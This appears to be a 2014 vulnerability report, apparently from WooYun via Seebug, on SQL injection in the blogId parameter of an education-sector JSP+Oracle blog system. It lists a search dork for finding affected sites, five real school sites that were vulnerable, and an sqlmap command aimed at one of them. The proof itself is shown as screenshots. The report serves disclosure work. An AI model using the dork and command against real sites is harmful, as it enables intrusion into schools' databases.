### 简要描述:
教育系统,危害很大啊
### 详细说明:
#1.通用程序的介绍
```
1、建站程序类型:JSP+Oracle
2、漏洞类型:SQL注入
3、注入参数:blogId
4、危害程度:高危
8、涉及厂商:上海释锐教育软件有限公司
9、厂商网站:http://threeoa.com/
10、是否拥有源代码分析:暂无
12、inurl:space?blogId=
13、是否默认配置:是
14、枚举案例【应乌云的要求,枚举5例】:
http://www.threeoa.com/ 附官网一枚
http://www.hshsh.pudong-edu.sh.cn/
http://www.yk2z.ykedu.net/
http://www.zjyk2z.net/
http://58.217.106.249/
```
### 漏洞证明:
#2.通用型漏洞证明
先尝试是否有注入
[<img src="https://images.seebug.org/upload/201409/271105143f7b80da2090e359307268d527d83a34.jpg" alt="QQ截图20140927110453.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/271105143f7b80da2090e359307268d527d83a34.jpg)
实例1:
```
python sqlmap.py -u http://www.threeoa.com/bl40/space?blogId=201611032
```
[<img src="https://images.seebug.org/upload/201409/27110712fd53856fe5a8c112af4f427f535c1e2e.jpg" alt="QQ截图20140927110635.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/27110712fd53856fe5a8c112af4f427f535c1e2e.jpg)
[<img src="https://images.seebug.org/upload/201409/27131302243165fdd44ebfe064b3896863ff585a.jpg" alt="QQ截图20140927131240.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/27131302243165fdd44ebfe064b3896863ff585a.jpg)
实例2:
```
http://www.hshsh.pudong-edu.sh.cn/bl/space?blogId=wxj
```
[<img src="https://images.seebug.org/upload/201409/27131337aee45f84c200748c739dae8f3fae2338.jpg" alt="QQ截图20140927131317.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/27131337aee45f84c200748c739dae8f3fae2338.jpg)
实例3:
```
http://www.yk2z.ykedu.net/bl/space?blogId=yk2zt0117&tpId=1
```
[<img src="https://images.seebug.org/upload/201409/2713302993aab4b8f2a450441ad7c25c10b464fa.jpg" alt="QQ截图20140927132959.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2713302993aab4b8f2a450441ad7c25c10b464fa.jpg)
实例4:
```
http://www.zjyk2z.net/bl/space?blogId=yk2zt0093
```
[<img src="https://images.seebug.org/upload/201409/27155842f6ad70dd5e285a89ce77843fe86d9283.png" alt="QQ截图20140927155823.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/27155842f6ad70dd5e285a89ce77843fe86d9283.png)
实例5:
```
http://58.217.106.249/bl/space?blogId=t161&tpId=1
```
[<img src="https://images.seebug.org/upload/201409/271614566187f3619e958cf821657fce79892b2c.png" alt="QQ截图20140927161434.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/271614566187f3619e958cf821657fce79892b2c.png)
暂无评论